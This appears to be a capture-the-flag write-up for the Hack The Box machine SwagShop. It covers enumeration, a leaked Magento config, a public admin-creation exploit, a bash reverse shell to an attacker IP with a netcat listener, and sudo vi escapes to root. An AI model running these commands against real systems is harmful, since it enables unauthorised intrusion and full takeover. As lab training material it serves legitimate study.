HTB | SwagShop

This is the Box on Hack The Box Linux Privilege Escalation 101 Track. Find the box here.

Skill Learned

• Exploit modification

• GTFObins

NMAP

IP: 10.10.10.140

nmap -sT -p- --min-rate 10000 10.10.10.140

nmap -sC -sV -p 22,80 10.10.10.140

nmap scan

Port 80

Let's visit port 80

port 80

dirsearch -u http://swagshop.htb/ -e php,html -x 403,404

dirsearch

while looking at the directories I found http://swagshop.htb/app/etc/local.xml

Which have root/admin credentials

/app/etc/local.xml

not able to find any login page so I started fuzzing again.

dirsearch -u http://swagshop.htb/index.php/ -e php,html -x 403,404

dirsearch

found /index.php/admin

/admin

Foothold/shell

let's try to login with the credential we got earlier, it was not working on googling I found this exploit.

In the script change target to http://swagshop.htb/index.php

and run the script

let's try forme:forme

and we are in

Magento admin panel

A simple Google search found me this.

In the script change username, password and install_date and run the script

change username, password and install_date

python 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

python 37811.py

now we can try for reverse shell

python 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'exec bash -i>& /dev/tcp/10.10.14.6/1234 0>&1'"

nc -nlvp 1234

found the user.txt

user.txt

Priv Esc

sudo -l

sudo -l

we can use /usr/bin/vi /var/www/html/* without password

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

and we can have root.txt

root.txt

Now let's try for shell

GTFObin tells me how to get shell

sudo /usr/bin/vi /var/www/html/a 
:set shell=/bin/sh
:shell

root